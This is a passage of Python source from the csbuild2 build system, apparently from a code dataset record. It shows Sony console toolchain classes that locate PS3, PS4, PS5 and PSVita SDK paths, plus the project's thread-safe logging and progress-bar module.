csbuild.ProjectType.SharedLibrary,\n\t\t\tPs3ProjectType.PpuGccStaticLibrary: csbuild.ProjectType.StaticLibrary,\n\n\t\t\tPs3ProjectType.SpuApplication: csbuild.ProjectType.Application,\n\t\t\tPs3ProjectType.SpuSharedLibrary: csbuild.ProjectType.SharedLibrary,\n\t\t\tPs3ProjectType.SpuStaticLibrary: csbuild.ProjectType.StaticLibrary,\n\t\t}.get(projectType, None)\n\n\t\tself.toolsetType = {\n\t\t\tPs3ProjectType.PpuSncApplication: Ps3ToolsetType.PpuSnc,\n\t\t\tPs3ProjectType.PpuSncSharedLibrary: Ps3ToolsetType.PpuSnc,\n\t\t\tPs3ProjectType.PpuSncStaticLibrary: Ps3ToolsetType.PpuSnc,\n\n\t\t\tPs3ProjectType.PpuGccApplication: Ps3ToolsetType.PpuGcc,\n\t\t\tPs3ProjectType.PpuGccSharedLibrary: Ps3ToolsetType.PpuGcc,\n\t\t\tPs3ProjectType.PpuGccStaticLibrary: Ps3ToolsetType.PpuGcc,\n\n\t\t\tPs3ProjectType.SpuApplication: Ps3ToolsetType.Spu,\n\t\t\tPs3ProjectType.SpuSharedLibrary: Ps3ToolsetType.Spu,\n\t\t\tPs3ProjectType.SpuStaticLibrary: Ps3ToolsetType.Spu,\n\t\t}.get(projectType, None)\n\n\t\tassert self.outputType is not None, \"Cannot determine PS3 build info, invalid project type: {}\".format(projectType)\n\t\tassert self.toolsetType is not None, \"Cannot determine PS3 build info, invalid project type: {}\".format(projectType)\n\n\n@MetaClass(ABCMeta)\nclass SonyBaseTool(Tool):\n\t\"\"\"\n\tParent class for all Sony tools.\n\n\t:param projectSettings: A read-only scoped view into the project settings dictionary\n\t:type projectSettings: toolchain.ReadOnlySettingsView\n\t\"\"\"\n\tdef __init__(self, projectSettings):\n\t\tTool.__init__(self, projectSettings)\n\n\n@MetaClass(ABCMeta)\nclass Ps3BaseTool(SonyBaseTool):\n\t\"\"\"\n\tParent class for all PS3 tools.\n\n\t:param projectSettings: A read-only scoped view into the project settings dictionary\n\t:type projectSettings: toolchain.ReadOnlySettingsView\n\t\"\"\"\n\tdef __init__(self, projectSettings):\n\t\tSonyBaseTool.__init__(self, projectSettings)\n\n\t\tself._ps3SdkPath = projectSettings.get(\"ps3SdkPath\", None)\n\t\tself._ps3SnPath = projectSettings.get(\"ps3SnPath\", None)\n\n\t\tself._ps3BuildInfo = None # type: Ps3BuildInfo\n\t\tself._ps3HostBinPath = None # type: str\n\t\tself._ps3SystemBinPath = None # type: str\n\t\tself._ps3SystemLibPaths = [] # type: list[str]\n\t\tself._ps3SystemIncludePaths = [] # type: list[str]\n\n\n\t####################################################################################################################\n\t### Static makefile methods\n\t####################################################################################################################\n\n\t@staticmethod\n\tdef SetPs3SdkPath(path):\n\t\t\"\"\"\n\t\tSet the path to the PS3 SDK.\n\n\t\t:param path: Path to the PS3 SDK.\n\t\t:type path: str\n\t\t\"\"\"\n\t\tcsbuild.currentPlan.SetValue(\"ps3SdkPath\", os.path.abspath(path) if path else None)\n\n\t@staticmethod\n\tdef SetPs3SnPath(path):\n\t\t\"\"\"\n\t\tSet the path to the PS3 SN Systems directory.\n\n\t\t:param path: Path to the PS3 SN Systems installation directory.\n\t\t:type path: str\n\t\t\"\"\"\n\t\tcsbuild.currentPlan.SetValue(\"ps3SnPath\", os.path.abspath(path) if path else None)\n\n\n\t####################################################################################################################\n\t### Methods implemented from base classes\n\t####################################################################################################################\n\n\tdef SetupForProject(self, project):\n\t\t# If the SDK path wasn't set, attempt to find it from the 
environment.\n\t\tif not self._ps3SdkPath:\n\t\t\tself._ps3SdkPath = os.getenv(\"SCE_PS3_ROOT\", None)\n\n\t\tif not self._ps3SnPath:\n\t\t\tself._ps3SnPath = os.getenv(\"SN_PS3_PATH\", None)\n\n\t\tassert self._ps3SdkPath, \"No PS3 SDK path has been set\"\n\t\tassert os.access(self._ps3SdkPath, os.F_OK), \"PS3 SDK path does not exist: {}\".format(self._ps3SdkPath)\n\n\t\tassert self._ps3SnPath, \"No PS3 SN Systems path has been set\"\n\t\tassert os.access(self._ps3SnPath, os.F_OK), \"PS3 SN Systems path does not exist: {}\".format(self._ps3SnPath)\n\n\t\tself._ps3BuildInfo = Ps3BuildInfo(project.projectType)\n\n\t\tself._ps3SdkPath = os.path.abspath(self._ps3SdkPath)\n\t\tself._ps3SnPath = os.path.abspath(self._ps3SnPath)\n\n\t\thostRootPath = os.path.join(self._ps3SdkPath, \"host-win32\")\n\t\tself._ps3HostBinPath = os.path.join(hostRootPath, \"bin\")\n\n\t\tbuildToolRootPath = {\n\t\t\tPs3ToolsetType.PpuSnc: os.path.join(hostRootPath, \"sn\"),\n\t\t\tPs3ToolsetType.PpuGcc: os.path.join(hostRootPath, \"ppu\"),\n\t\t\tPs3ToolsetType.Spu: os.path.join(hostRootPath, \"spu\"),\n\t\t}.get(self._ps3BuildInfo.toolsetType, None)\n\n\t\tself._ps3SystemBinPath = os.path.join(buildToolRootPath, \"bin\")\n\t\tself._ps3SystemLibPaths = []\n\t\tself._ps3SystemIncludePaths = [\n\t\t\tos.path.join(self._ps3SdkPath, \"target\", \"common\", \"include\"),\n\t\t]\n\n\t\tif self._ps3BuildInfo.toolsetType == Ps3ToolsetType.Spu:\n\t\t\tself._ps3SystemLibPaths.extend([\n\t\t\t\tos.path.join(self._ps3SnPath, \"spu\", \"lib\", \"sn\"),\n\t\t\t\tos.path.join(self._ps3SdkPath, \"target\", \"spu\", \"lib\"),\n\t\t\t])\n\n\t\t\tself._ps3SystemIncludePaths.extend([\n\t\t\t\tos.path.join(self._ps3SnPath, \"spu\", \"include\", \"sn\"),\n\t\t\t\tos.path.join(self._ps3SdkPath, \"target\", \"spu\", \"include\"),\n\t\t\t])\n\n\t\telse:\n\t\t\tself._ps3SystemLibPaths.extend([\n\t\t\t\tos.path.join(self._ps3SnPath, \"ppu\", \"lib\", \"sn\"),\n\t\t\t\tos.path.join(self._ps3SdkPath, \"target\", \"ppu\", \"lib\"),\n\t\t\t])\n\n\t\t\tself._ps3SystemIncludePaths.extend([\n\t\t\t\tos.path.join(self._ps3SnPath, \"ppu\", \"include\", \"sn\"),\n\t\t\t\tos.path.join(self._ps3SdkPath, \"target\", \"ppu\", \"include\"),\n\t\t\t])\n\n\nclass Ps3SpuConverter(Ps3BaseTool, HasOptimizationLevel):\n\t\"\"\"\n\tTool that converts SPU binaries to PPU compiled objects for linking into PPU binaries.\n\n\t:param projectSettings: A read-only scoped view into the project settings dictionary\n\t:type projectSettings: toolchain.ReadOnlySettingsView\n\t\"\"\"\n\tsupportedPlatforms = { \"Windows\" }\n\tsupportedArchitectures = { \"cell\" }\n\tinputFiles = { \".spu_elf\", \".spu_so\" }\n\toutputFiles = { \".a\" }\n\n\t################################################################################\n\t### Initialization\n\t################################################################################\n\n\tdef __init__(self, projectSettings):\n\t\tPs3BaseTool.__init__(self, projectSettings)\n\t\tHasOptimizationLevel.__init__(self, projectSettings)\n\n\n\t################################################################################\n\t### Internal methods\n\t################################################################################\n\n\tdef _getOutputFiles(self, project, inputFile):\n\t\tinputFileExtSplit = os.path.splitext(os.path.basename(inputFile.filename))\n\t\toutputFilePath = os.path.join(\n\t\t\tproject.outputDir,\n\t\t\t\"{}{}.a\".format(\n\t\t\t\tinputFileExtSplit[0],\n\t\t\t\tinputFileExtSplit[1].replace(\".\", 
\"_\")\n\t\t\t)\n\t\t)\n\t\treturn tuple({ outputFilePath })\n\n\tdef _getCommand(self, project, inputFile):\n\t\tcmdExe = self._getExeName()\n\t\tcmd = [cmdExe] \\\n\t\t\t+ self._getStripModeArgs() \\\n\t\t\t+ self._getInputArgs(inputFile) \\\n\t\t\t+ self._getOutputArgs(project, inputFile)\n\n\t\treturn cmd\n\n\tdef _getExeName(self):\n\t\treturn os.path.join(self._ps3HostBinPath, \"spu_elf-to-ppu_obj.exe\")\n\n\tdef _getStripModeArgs(self):\n\t\tstripMode = {\n\t\t\tOptimizationLevel.Disabled: \"none\",\n\t\t\tOptimizationLevel.Max: \"hard\",\n\t\t}.get(self._optLevel, \"normal\")\n\t\treturn [\"--strip-mode={}\".format(stripMode)]\n\n\tdef _getInputArgs(self, inputFile):\n\t\treturn [inputFile.filename]\n\n\tdef _getOutputArgs(self, project, inputFile):\n\t\treturn [self._getOutputFiles(project, inputFile)[0]]\n\n\n\t################################################################################\n\t### Base class methods containing logic shared by all subclasses\n\t################################################################################\n\n\tdef SetupForProject(self, project):\n\t\tPs3BaseTool.SetupForProject(self, project)\n\n\tdef Run(self, inputProject, inputFile):\n\t\t\"\"\"\n\t\tExecute a single build step. Note that this method is run massively in parallel with other build steps.\n\t\tIt is NOT thread-safe in ANY way. If you need to change shared state within this method, you MUST use a\n\t\tmutex.\n\n\t\t:param inputProject: project being built\n\t\t:type inputProject: csbuild._build.project.Project\n\t\t:param inputFile: File to build\n\t\t:type inputFile: input_file.InputFile\n\t\t:return: tuple of files created by the tool - all files must have an extension in the outputFiles list\n\t\t:rtype: tuple[str]\n\n\t\t:raises BuildFailureException: Build process exited with an error.\n\t\t\"\"\"\n\t\tlog.Build(\n\t\t\t\"Converting SPU binary {} ({}-{}-{})...\",\n\t\t\tos.path.basename(inputFile.filename),\n\t\t\tinputProject.toolchainName,\n\t\t\tinputProject.architectureName,\n\t\t\tinputProject.targetName\n\t\t)\n\n\t\treturncode, _, _ = commands.Run(self._getCommand(inputProject, inputFile))\n\t\tif returncode != 0:\n\t\t\traise csbuild.BuildFailureException(inputProject, inputFile)\n\t\treturn self._getOutputFiles(inputProject, inputFile)\n\n\n@MetaClass(ABCMeta)\nclass Ps4BaseTool(SonyBaseTool):\n\t\"\"\"\n\tParent class for all PS4 tools.\n\n\t:param projectSettings: A read-only scoped view into the project settings dictionary\n\t:type projectSettings: toolchain.ReadOnlySettingsView\n\t\"\"\"\n\tdef __init__(self, projectSettings):\n\t\tSonyBaseTool.__init__(self, projectSettings)\n\n\t\tself._ps4SdkPath = projectSettings.get(\"ps4SdkPath\", None)\n\n\n\t####################################################################################################################\n\t### Static makefile methods\n\t####################################################################################################################\n\n\t@staticmethod\n\tdef SetPs4SdkPath(sdkPath):\n\t\t\"\"\"\n\t\tSet the path to the PS4 SDK.\n\n\t\t:param sdkPath: Path to the PS4 SDK.\n\t\t:type sdkPath: str\n\t\t\"\"\"\n\t\tcsbuild.currentPlan.SetValue(\"ps4SdkPath\", os.path.abspath(sdkPath) if sdkPath else None)\n\n\n\t####################################################################################################################\n\t### Methods implemented from base 
classes\n\t####################################################################################################################\n\n\tdef SetupForProject(self, project):\n\t\t# If the SDK path wasn't set, attempt to find it from the environment.\n\t\tif not self._ps4SdkPath:\n\t\t\tself._ps4SdkPath = os.getenv(\"SCE_ORBIS_SDK_DIR\", None)\n\n\t\tassert self._ps4SdkPath, \"No PS4 SDK path has been set\"\n\t\tassert os.access(self._ps4SdkPath, os.F_OK), \"PS4 SDK path does not exist: {}\".format(self._ps4SdkPath)\n\n\n@MetaClass(ABCMeta)\nclass Ps5BaseTool(SonyBaseTool):\n\t\"\"\"\n\tParent class for all PS5 tools.\n\n\t:param projectSettings: A read-only scoped view into the project settings dictionary\n\t:type projectSettings: toolchain.ReadOnlySettingsView\n\t\"\"\"\n\tdef __init__(self, projectSettings):\n\t\tSonyBaseTool.__init__(self, projectSettings)\n\n\t\tself._ps5SdkPath = projectSettings.get(\"ps5SdkPath\", None)\n\n\n\t####################################################################################################################\n\t### Static makefile methods\n\t####################################################################################################################\n\n\t@staticmethod\n\tdef SetPs5SdkPath(sdkPath):\n\t\t\"\"\"\n\t\tSet the path to the PS5 SDK.\n\n\t\t:param sdkPath: Path to the PS5 SDK.\n\t\t:type sdkPath: str\n\t\t\"\"\"\n\t\tcsbuild.currentPlan.SetValue(\"ps5SdkPath\", os.path.abspath(sdkPath) if sdkPath else None)\n\n\n\t####################################################################################################################\n\t### Methods implemented from base classes\n\t####################################################################################################################\n\n\tdef SetupForProject(self, project):\n\t\t# If the SDK path wasn't set, attempt to find it from the environment.\n\t\tif not self._ps5SdkPath:\n\t\t\tself._ps5SdkPath = os.getenv(\"SCE_PROSPERO_SDK_DIR\", None)\n\n\t\tassert self._ps5SdkPath, \"No PS5 SDK path has been set\"\n\t\tassert os.access(self._ps5SdkPath, os.F_OK), \"PS5 SDK path does not exist: {}\".format(self._ps5SdkPath)\n\n\n@MetaClass(ABCMeta)\nclass PsVitaBaseTool(SonyBaseTool):\n\t\"\"\"\n\tParent class for all PSVita tools.\n\n\t:param projectSettings: A read-only scoped view into the project settings dictionary\n\t:type projectSettings: toolchain.ReadOnlySettingsView\n\t\"\"\"\n\tdef __init__(self, projectSettings):\n\t\tSonyBaseTool.__init__(self, projectSettings)\n\n\t\tself._psVitaSdkPath = projectSettings.get(\"psVitaSdkPath\", None)\n\n\n\t####################################################################################################################\n\t### Static makefile methods\n\t####################################################################################################################\n\n\t@staticmethod\n\tdef SetPsVitaSdkPath(sdkPath):\n\t\t\"\"\"\n\t\tSet the path to the PSVita SDK.\n\n\t\t:param sdkPath: Path to the PSVita SDK.\n\t\t:type sdkPath: str\n\t\t\"\"\"\n\t\tcsbuild.currentPlan.SetValue(\"psVitaSdkPath\", os.path.abspath(sdkPath) if sdkPath else None)\n\n\n\t####################################################################################################################\n\t### Methods implemented from base classes\n\t####################################################################################################################\n\n\tdef SetupForProject(self, project):\n\t\t# If the SDK path wasn't set, attempt to find it from the environment.\n\t\tif not 
self._psVitaSdkPath:\n\t\t\tself._psVitaSdkPath = os.getenv(\"SCE_PSP2_SDK_DIR\", None)\n\n\t\tassert self._psVitaSdkPath, \"No PSVita SDK path has been set\"\n\t\tassert os.access(self._psVitaSdkPath, os.F_OK), \"PSVita SDK path does not exist: {}\".format(self._psVitaSdkPath)\n" }, { "alpha_fraction": 0.6880289316177368, "alphanum_fraction": 0.6910653114318848, "avg_line_length": 26.061189651489258, "blob_id": "993250b39e5a45fef98ad20fad34f2d6e9cc2d29", "content_id": "fc97c67e4a532a22e82519ce01b8422fd7a73690", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 15479, "license_type": "no_license", "max_line_length": 132, "num_lines": 572, "path": "/csbuild/log.py", "repo_name": "SleepingCatGames/csbuild2", "src_encoding": "UTF-8", "text": "# Copyright (C) 2016 Jaedyn K. Draper\n#\n# Permission is hereby granted, free of charge, to any person obtaining\n# a copy of this software and associated documentation files (the \"Software\"),\n# to deal in the Software without restriction, including without limitation\n# the rights to use, copy, modify, merge, publish, distribute, sublicense,\n# and/or sell copies of the Software, and to permit persons to whom the\n# Software is furnished to do so, subject to the following conditions:\n#\n# The above copyright notice and this permission notice shall be included in\n# all copies or substantial portions of the Software.\n#\n# THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\n# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\n# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL\n# THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\n# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,\n# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE\n# SOFTWARE.\n\n\"\"\"\n.. module:: log\n\t:synopsis: Thread-safe logging system\n\n.. moduleauthor:: Jaedyn K. Draper\n\"\"\"\n\nfrom __future__ import unicode_literals, division, print_function\n\nimport sys\nimport threading\nimport re\nimport time\nimport math\n\nfrom ._utils import terminfo, shared_globals, BytesType, StrType, queue, FormatTime, PlatformUnicode\nfrom ._utils.shared_globals import Verbosity\nfrom . 
import perf_timer\n\n_logQueue = queue.Queue()\n_stopEvent = object()\n_callbackQueue = None\n_logThread = threading.currentThread()\n_barPresent = False\n_lastPerc = 0.0\n_sep = \"<\"\n_fillChar = \"\\u2219\"\n\nColor = terminfo.TermColor\n\ndef _printProgressBar():\n\twith perf_timer.PerfTimer(\"printProgressBar\"):\n\t\tglobal _barPresent\n\t\tglobal _lastPerc\n\t\tglobal _sep\n\t\tglobal _fillChar\n\t\tcompleteBuilds = shared_globals.completedBuilds\n\t\ttotalBuilds = shared_globals.totalBuilds\n\t\tif shared_globals.columns != 0 and completeBuilds < totalBuilds:\n\t\t\t_barPresent = True\n\t\t\ttextSize = 42\n\n\t\t\tperc = 1 if totalBuilds == 0 else float(completeBuilds)/float(totalBuilds)\n\t\t\tif perc == 0:\n\t\t\t\t_sep = \"-\"\n\t\t\telif perc > _lastPerc:\n\t\t\t\t_sep = \">\"\n\t\t\telif perc < _lastPerc:\n\t\t\t\t_sep = \"<\"\n\t\t\t_lastPerc = perc\n\n\t\t\tincr = int(shared_globals.columns / 50)\n\t\t\tif totalBuilds <= incr:\n\t\t\t\tcount = totalBuilds * 4\n\t\t\telif totalBuilds <= incr * 2:\n\t\t\t\tcount = incr * 4 + (totalBuilds-incr) * 3\n\t\t\telif totalBuilds <= incr * 3:\n\t\t\t\tcount = incr * 4 + incr * 3 + (totalBuilds-incr*2) * 2\n\t\t\telse:\n\t\t\t\tcount = incr * 4 + incr * 3 + incr * 2 + (totalBuilds-incr*3)\n\n\t\t\tif count >= shared_globals.columns - textSize:\n\t\t\t\tcount = shared_globals.columns - textSize - 1\n\n\t\t\tnum = int( math.floor( perc * count ) )\n\n\t\t\tlside = num\n\t\t\trside = count - num - 1\n\n\t\t\ttotal = lside + rside + textSize\n\t\t\tmaxSpace = (shared_globals.columns-1) / 2\n\t\t\tspacePerSide = maxSpace - (total/2)\n\n\t\t\tif spacePerSide <= 1:\n\t\t\t\tlfill = \"\"\n\t\t\t\trfill = \"\"\n\t\t\telse:\n\t\t\t\tlfill = _fillChar * int(math.ceil(spacePerSide))\n\t\t\t\trfill = _fillChar * int(math.floor(spacePerSide))\n\t\t\t\tif lfill:\n\t\t\t\t\tlfill = lfill[:-1] + \" \"\n\t\t\t\tif rfill:\n\t\t\t\t\trfill = \" \" + rfill[1:]\n\n\t\t\tif shared_globals.colorSupported:\n\t\t\t\tterminfo.TermInfo.SetColor(Color.WHITE)\n\n\t\t\tsys.stdout.write(\" [\")\n\n\t\t\tif shared_globals.colorSupported:\n\t\t\t\tsys.stdout.flush()\n\t\t\t\tterminfo.TermInfo.SetColor(Color.GREEN)\n\n\t\t\tsys.stdout.write(\"{: 4}\".format(completeBuilds))\n\n\t\t\tif shared_globals.colorSupported:\n\t\t\t\tsys.stdout.flush()\n\t\t\t\tterminfo.TermInfo.ResetColor()\n\n\t\t\tsys.stdout.write(\" tasks done \")\n\n\t\t\tif shared_globals.colorSupported:\n\t\t\t\tsys.stdout.flush()\n\t\t\t\tterminfo.TermInfo.SetColor(Color.WHITE)\n\n\t\t\tsys.stdout.write(\"] \")\n\n\t\t\tif shared_globals.colorSupported:\n\t\t\t\tsys.stdout.flush()\n\t\t\t\tterminfo.TermInfo.SetColor(Color.DGREY)\n\t\t\ttry:\n\t\t\t\tsys.stdout.write(lfill)\n\t\t\texcept UnicodeEncodeError:\n\t\t\t\t_fillChar = \":\"\n\t\t\t\t_printProgressBar()\n\t\t\t\treturn\n\n\t\t\tif shared_globals.colorSupported:\n\t\t\t\tsys.stdout.flush()\n\t\t\t\tterminfo.TermInfo.SetColor(Color.WHITE)\n\n\t\t\tsys.stdout.write(\"[\")\n\n\t\t\tif shared_globals.colorSupported:\n\t\t\t\tsys.stdout.flush()\n\t\t\t\tterminfo.TermInfo.SetColor(Color.DGREEN)\n\n\t\t\tsys.stdout.write(\"=\" * lside)\n\n\t\t\tif shared_globals.colorSupported:\n\t\t\t\tsys.stdout.flush()\n\t\t\t\tterminfo.TermInfo.ResetColor()\n\n\t\t\tif perc == 0:\n\t\t\t\tif shared_globals.colorSupported:\n\t\t\t\t\tsys.stdout.flush()\n\t\t\t\t\tterminfo.TermInfo.SetColor(Color.DYELLOW)\n\n\t\t\tsys.stdout.write(_sep)\n\n\t\t\tif 
shared_globals.colorSupported:\n\t\t\t\tsys.stdout.flush()\n\t\t\t\tterminfo.TermInfo.SetColor(Color.DYELLOW)\n\n\t\t\tsys.stdout.write(\"-\" * rside)\n\n\t\t\tif shared_globals.colorSupported:\n\t\t\t\tsys.stdout.flush()\n\t\t\t\tterminfo.TermInfo.SetColor(Color.WHITE)\n\n\t\t\tsys.stdout.write(\"]\")\n\n\t\t\tif shared_globals.colorSupported:\n\t\t\t\tsys.stdout.flush()\n\t\t\t\tterminfo.TermInfo.SetColor(Color.DGREY)\n\t\t\tsys.stdout.write(rfill)\n\t\t\tif shared_globals.colorSupported:\n\t\t\t\tsys.stdout.flush()\n\t\t\t\tterminfo.TermInfo.SetColor(Color.WHITE)\n\n\t\t\tsys.stdout.write(\" [\")\n\n\t\t\tif shared_globals.colorSupported:\n\t\t\t\tsys.stdout.flush()\n\t\t\t\tterminfo.TermInfo.SetColor(Color.YELLOW)\n\n\t\t\tsys.stdout.write(\"{: 4}\".format(totalBuilds))\n\n\t\t\tif shared_globals.colorSupported:\n\t\t\t\tsys.stdout.flush()\n\t\t\t\tterminfo.TermInfo.ResetColor()\n\n\t\t\tsys.stdout.write(\" discovered \")\n\t\t\tif shared_globals.colorSupported:\n\t\t\t\tsys.stdout.flush()\n\t\t\t\tterminfo.TermInfo.SetColor(Color.WHITE)\n\t\t\tsys.stdout.write(\"]\")\n\t\t\tsys.stdout.flush()\n\n\t\t\tif shared_globals.colorSupported:\n\t\t\t\tterminfo.TermInfo.ResetColor()\n\t\telse:\n\t\t\t_barPresent = False\n\ndef _clearProgressBar():\n\twith perf_timer.PerfTimer(\"clearProgressBar\"):\n\t\tglobal _barPresent\n\t\tif _barPresent:\n\t\t\tsys.stdout.write(shared_globals.clearBar)\n\t\t\t_barPresent = False\n\ndef UpdateProgressBar():\n\t\"\"\"Update the progress bar\"\"\"\n\twith perf_timer.PerfTimer(\"updateProgressBar\"):\n\t\tif threading.current_thread() != _logThread:\n\t\t\t_callbackQueue.Put(UpdateProgressBar)\n\t\telse:\n\t\t\t_clearProgressBar()\n\t\t\t_printProgressBar()\n\n_twoTagMatch = re.compile(R\"(<&\\w*>)(.*?)(</&>|$)\")\n_tagNameMatch = re.compile(R\"<&(\\w*)>\")\n\ndef _writeLog(color, level, msg, destination=sys.stdout):\n\twith perf_timer.PerfTimer(\"Logging\"):\n\t\t_clearProgressBar()\n\n\t\tif shared_globals.colorSupported and color is not None:\n\t\t\tterminfo.TermInfo.SetColor(color)\n\t\t\tif level is not None:\n\t\t\t\tdestination.write(\"{}: \".format(level))\n\t\t\tdestination.flush()\n\t\t\tterminfo.TermInfo.ResetColor()\n\n\t\t\tif \"</\" in msg:\n\t\t\t\twith perf_timer.PerfTimer(\"Regex splitting\"):\n\t\t\t\t\tsplit = _twoTagMatch.split(msg)\n\t\t\t\t\tfor piece in split:\n\t\t\t\t\t\tmatch = _tagNameMatch.match(piece)\n\t\t\t\t\t\tif match:\n\t\t\t\t\t\t\tcolor = getattr(Color, match.group(1))\n\t\t\t\t\t\t\tterminfo.TermInfo.SetColor(color)\n\t\t\t\t\t\telif piece == 
\"</&>\":\n\t\t\t\t\t\t\tcontinue\n\t\t\t\t\t\ttry:\n\t\t\t\t\t\t\tdestination.write(piece)\n\t\t\t\t\t\texcept UnicodeEncodeError:\n\t\t\t\t\t\t\tdestination.write(piece.encode(\"ascii\", \"replace\").decode(\"ascii\", \"replace\"))\n\t\t\telse:\n\t\t\t\ttry:\n\t\t\t\t\tdestination.write(msg)\n\t\t\t\texcept UnicodeEncodeError:\n\t\t\t\t\tdestination.write(msg.encode(\"ascii\", \"replace\").decode(\"ascii\", \"replace\"))\n\n\t\t\tdestination.write(\"\\n\")\n\n\t\tif shared_globals.logFile:\n\t\t\tshared_globals.logFile.write(\"{0}: {1}\\n\".format(level, msg))\n\t\t_printProgressBar()\n\t\tdestination.flush()\n\ndef Pump():\n\t\"\"\"\n\tPrint logs that have been inserted into the queue from another thread.\n\tLogs inserted on the main thread are printed immediately -\n\tin single-threaded contexts this function is irrelevant\n\t\"\"\"\n\ttry:\n\t\t# Pump all logs till we get an Empty exception, then return\n\t\twhile True:\n\t\t\tevent = _logQueue.Get()\n\t\t\t_writeLog(*event)\n\texcept IndexError:\n\t\treturn\n\ndef SetCallbackQueue(callbackQueue):\n\t\"\"\"\n\tSet the callback queue for threaded logging - a Pump call will be added to the queue each time a log call is made.\n\tThis will ensure that logs are printed as quickly as possible after being inserted into the queue.\n\n\t:param callbackQueue: A queue for executing Pump calls\n\t:type callbackQueue: queue.Queue\n\t\"\"\"\n\tglobal _callbackQueue\n\t_callbackQueue = callbackQueue\n\ndef StartLogThread():\n\t\"\"\"Start the log thread\"\"\"\n\tglobal _callbackQueue\n\t_callbackQueue = queue.Queue()\n\tglobal _logThread\n\tdef _logThreadRunner():\n\t\twhile True:\n\t\t\ttask = _callbackQueue.GetBlocking()\n\t\t\tif task is _stopEvent:\n\t\t\t\treturn\n\t\t\ttask()\n\t_logThread = threading.Thread(target=_logThreadRunner)\n\t_logThread.start()\n\ndef StopLogThread():\n\t\"\"\"Stop the log thread if it's running. 
If not, this is a nop.\"\"\"\n\tglobal _logThread\n\tif threading.currentThread() != _logThread:\n\t\t_callbackQueue.Put(_stopEvent)\n\t\t_logThread.join()\n\t\t_logThread = threading.current_thread()\n\ndef _logMsg(color, level, msg, quietThreshold):\n\t\"\"\"Print a message to stdout\"\"\"\n\tif shared_globals.verbosity < quietThreshold:\n\t\tif isinstance(msg, BytesType):\n\t\t\tmsg = msg.decode(\"UTF-8\")\n\t\tif threading.currentThread() == _logThread:\n\t\t\t_writeLog(color, level, msg)\n\t\telse:\n\t\t\tassert _callbackQueue is not None, \"Threaded logging requires a callback queue (shared with ThreadPool)\"\n\t\t\t_logQueue.Put((color, level, msg))\n\t\t\t_callbackQueue.Put(Pump)\n\ndef _logMsgToStderr(color, level, msg, quietThreshold):\n\t\"\"\"Print a message to stderr\"\"\"\n\tif shared_globals.verbosity < quietThreshold:\n\t\tif isinstance(msg, BytesType):\n\t\t\tmsg = msg.decode(\"UTF-8\")\n\t\tif threading.currentThread() == _logThread:\n\t\t\t_writeLog(color, level, msg, sys.stderr)\n\t\telse:\n\t\t\tassert _callbackQueue is not None, \"Threaded logging requires a callback queue (shared with ThreadPool)\"\n\t\t\t_logQueue.Put((color, level, msg, sys.stderr))\n\t\t\t_callbackQueue.Put(Pump)\n\n\ndef _formatMsg(msg, *args, **kwargs):\n\tshowTime = kwargs.get(\"showTime\")\n\tif showTime is True or showTime is None:\n\t\tcurtime = time.time( ) - shared_globals.startTime\n\t\tmsg = \"{} ({})\".format(PlatformUnicode(msg), FormatTime(curtime, False))\n\tif showTime is not None:\n\t\tdel kwargs[\"showTime\"]\n\n\tif not isinstance(msg, BytesType) and not isinstance(msg, StrType):\n\t\treturn repr(msg)\n\tif args or kwargs:\n\t\treturn msg.format(*args, **kwargs)\n\treturn msg\n\n\ndef Error(msg, *args, **kwargs):\n\t\"\"\"\n\tLog an error message\n\n\t:param msg: Text to log\n\t:type msg: BytesType, StrType\n\t:param args: Args to str.format\n\t:type args: any\n\t:param kwargs: args to str.format\n\t:type kwargs: any\n\t\"\"\"\n\tmsg = _formatMsg(msg, *args, **kwargs)\n\t_logMsg(Color.RED, \"ERROR\", msg, Verbosity.Mute)\n\tshared_globals.errors.append(msg)\n\n\ndef Warn(msg, *args, **kwargs):\n\t\"\"\"\n\tLog a warning\n\n\t:param msg: Text to log\n\t:type msg: BytesType, StrType\n\t:param args: Args to str.format\n\t:type args: any\n\t:param kwargs: args to str.format\n\t:type kwargs: any\n\t\"\"\"\n\tmsg = _formatMsg(msg, *args, **kwargs)\n\t_logMsg(Color.YELLOW, \"WARN\", msg, Verbosity.Mute)\n\tshared_globals.warnings.append(msg)\n\n\ndef WarnNoPush(msg, *args, **kwargs):\n\t\"\"\"\n\tLog a warning, don't push it to the list of warnings to be echoed at the end of compilation.\n\n\t:param msg: Text to log\n\t:type msg: str\n\t:param args: Args to str.format\n\t:type args: any\n\t:param kwargs: args to str.format\n\t:type kwargs: any\n\t\"\"\"\n\tmsg = _formatMsg(msg, *args, **kwargs)\n\t_logMsg(Color.YELLOW, \"WARN\", msg, Verbosity.Mute)\n\n\ndef Info(msg, *args, **kwargs):\n\t\"\"\"\n\tLog general info. 
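For example, a hypothetical call might be ``log.Info(\"Found {} source files\", fileCount)``, with the arguments deferred to str.format. 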
This info only appears with -v specified.\n\n\t:param msg: Text to log\n\t:type msg: str\n\t:param args: Args to str.format\n\t:type args: any\n\t:param kwargs: args to str.format\n\t:type kwargs: any\n\t\"\"\"\n\tmsg = _formatMsg(msg, *args, **kwargs)\n\t_logMsg(Color.CYAN, \"INFO\", msg, Verbosity.Normal)\n\n\ndef Build(msg, *args, **kwargs):\n\t\"\"\"\n\tLog info related to building\n\n\t:param msg: Text to log\n\t:type msg: str\n\t:param args: Args to str.format\n\t:type args: any\n\t:param kwargs: args to str.format\n\t:type kwargs: any\n\t\"\"\"\n\tmsg = _formatMsg(msg, *args, **kwargs)\n\t_logMsg(Color.MAGENTA, \"BUILD\", msg, Verbosity.Quiet)\n\n\ndef Test(msg, *args, **kwargs):\n\t\"\"\"\n\tLog info related to testing - typically used by the unit test framework, but could be used\n\tby makefiles that run tests as part of a build\n\n\t:param msg: Text to log\n\t:type msg: str\n\t:param args: Args to str.format\n\t:type args: any\n\t:param kwargs: args to str.format\n\t:type kwargs: any\n\t\"\"\"\n\tmsg = _formatMsg(msg, *args, **kwargs)\n\t_logMsg(Color.MAGENTA, \"TEST\", msg, Verbosity.Quiet)\n\n\ndef 